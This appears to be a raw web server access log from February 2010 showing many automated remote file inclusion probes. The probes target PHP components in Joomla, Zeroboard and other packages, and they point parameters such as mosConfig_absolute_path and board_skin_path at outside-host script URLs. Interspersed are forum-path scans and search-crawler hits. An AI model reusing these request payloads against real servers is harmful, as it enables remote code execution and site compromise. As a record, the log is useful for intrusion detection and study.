89.36.175.10 - - [18/Feb/2010:04:00:31 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:00:31 -0800] "GET /logs/access_100115.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:00:31 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.41.141 - - [18/Feb/2010:04:00:34 -0800] "GET /bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.41.141 - - [18/Feb/2010:04:00:34 -0800] "GET /logs/access_100205.log/bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.41.141 - - [18/Feb/2010:04:00:34 -0800] "GET /logs/bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:01:43 -0800] "GET /logs/access_100109.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.92.96.98 - - [18/Feb/2010:04:02:24 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
80.92.96.98 - - [18/Feb/2010:04:02:24 -0800] "GET /forum/index.php HTTP/1.0" 404 5258 "http://puaga.com/forum/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
80.92.96.98 - - [18/Feb/2010:04:02:25 -0800] "GET /phpbb/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
80.92.96.98 - - [18/Feb/2010:04:02:25 -0800] "GET /phpbb2/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
80.92.96.98 - - [18/Feb/2010:04:02:26 -0800] "GET /forums/index.php HTTP/1.0" 404 5258 "http://puaga.com/forums/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
80.92.96.98 - - [18/Feb/2010:04:02:26 -0800] "GET /board/index.php HTTP/1.0" 404 5258 "http://puaga.com/board/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
79.99.44.89 - - [18/Feb/2010:04:02:40 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [18/Feb/2010:04:02:40 -0800] "GET /logs/errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [18/Feb/2010:04:02:40 -0800] "GET /errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:04:03:34 -0800] "GET /logs/access_100121.log%20%20///bbs//delete_comment_update.php?board_skin_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:04:03:34 -0800] "GET //bbs//delete_comment_update.php?board_skin_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:04:03:39 -0800] "GET /logs///bbs//delete_comment_update.php?board_skin_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [18/Feb/2010:04:03:53 -0800] "GET /logs/access_100126.log%20%20///bbs//delete_comment_update.php?board_skin_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:04:05:43 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:04:05:43 -0800] "GET /logs/access_100202.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:04:05:43 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:04:05:51 -0800] "GET /logs/access_091210.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:04:05:53 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_091210.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:04:05:54 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_091210.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:04:06:01 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:04:06:01 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:04:06:01 -0800] "GET /logs/access_100202.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:04:06:15 -0800] "GET /logs/access_100111.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:04:06:28 -0800] "GET /logs/access_100111.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [18/Feb/2010:04:07:32 -0800] "GET /logs/access_100126.log%20%20//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:04:07:47 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:04:07:48 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:04:07:48 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:08:07 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:08:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:08:07 -0800] "GET /logs/access_100109.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:08:17 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:08:17 -0800] "GET /logs/access_100116.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:08:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:08:17 -0800] "GET /logs/access_100109.log//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:04:08:18 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:04:08:18 -0800] "GET /logs/access_100114.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:04:08:19 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:04:08:22 -0800] "GET /logs/access_100205.log/bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:04:08:22 -0800] "GET /bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:04:08:23 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [18/Feb/2010:04:08:23 -0800] "GET /logs/bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:08:25 -0800] "GET /logs/access_100116.log//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:04:08:31 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.41.141 - - [18/Feb/2010:04:09:27 -0800] "GET /logs/access_100205.log/bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.41.141 - - [18/Feb/2010:04:09:27 -0800] "GET /logs/bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.41.141 - - [18/Feb/2010:04:09:27 -0800] "GET /bbs/download.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:10:44 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:11:16 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:11:40 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:11:40 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:11:59 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:11:59 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:04:12:00 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:04:12:00 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:04:12:01 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:12:11 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:12:18 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [18/Feb/2010:04:13:08 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.205.227.101 - - [18/Feb/2010:04:14:11 -0800] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.205.227.101 - - [18/Feb/2010:04:14:11 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.205.227.101 - - [18/Feb/2010:04:14:11 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.205.227.101 - - [18/Feb/2010:04:14:32 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:04:15:05 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:04:15:05 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:04:15:05 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:04:15:38 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:04:15:38 -0800] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:04:15:38 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [18/Feb/2010:04:15:47 -0800] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [18/Feb/2010:04:15:47 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [18/Feb/2010:04:15:47 -0800] "GET /logs/access_100208.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [18/Feb/2010:04:15:48 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [18/Feb/2010:04:15:48 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [18/Feb/2010:04:15:48 -0800] "GET /logs/access_100104.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:15:56 -0800] "GET /logs/access_100123.log//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:04:15:58 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.127 - - [18/Feb/2010:04:16:07 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [18/Feb/2010:04:16:38 -0800] "GET /logs/access_100104.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [18/Feb/2010:04:16:38 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [18/Feb/2010:04:16:38 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:04:17:02 -0800] "GET /logs/access_100203.log%20%20//delete_comment.php?board_skin_path=?board_skin_path=?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:04:17:02 -0800] "GET /delete_comment.php?board_skin_path=?board_skin_path=?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [18/Feb/2010:04:17:02 -0800] "GET /logs//delete_comment.php?board_skin_path=?board_skin_path=?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [18/Feb/2010:04:17:35 -0800] "GET /logs/access_100201.log HTTP/1.0" 200 1347886 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
222.239.227.209 - - [18/Feb/2010:04:17:39 -0800] "GET /logs/access_100127.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:04:18:31 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:04:18:31 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [18/Feb/2010:04:18:31 -0800] "GET /logs/access_100117.log%20%20/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:18:34 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:18:34 -0800] "GET /logs/access_100109.log//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:18:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.161.133.1 - - [18/Feb/2010:04:18:43 -0800] "GET /logs/access_100116.log//modules/vwar/admin/admin.php?vwar_root=http://maniacos.net/_vti_text?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [18/Feb/2010:04:18:44 -0800] "GET /logs/access_100127.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:19:16 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:19:16 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:19:16 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [18/Feb/2010:04:19:18 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [18/Feb/2010:04:19:18 -0800] "GET /logs/access_100112.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [18/Feb/2010:04:19:18 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [18/Feb/2010:04:19:22 -0800] "GET /logs/access_100124.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [18/Feb/2010:04:20:08 -0800] "GET /logs/access_100127.log/errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:04:20:12 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:04:20:13 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:04:20:14 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [18/Feb/2010:04:20:17 -0800] "GET /logs/access_100201.log/errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
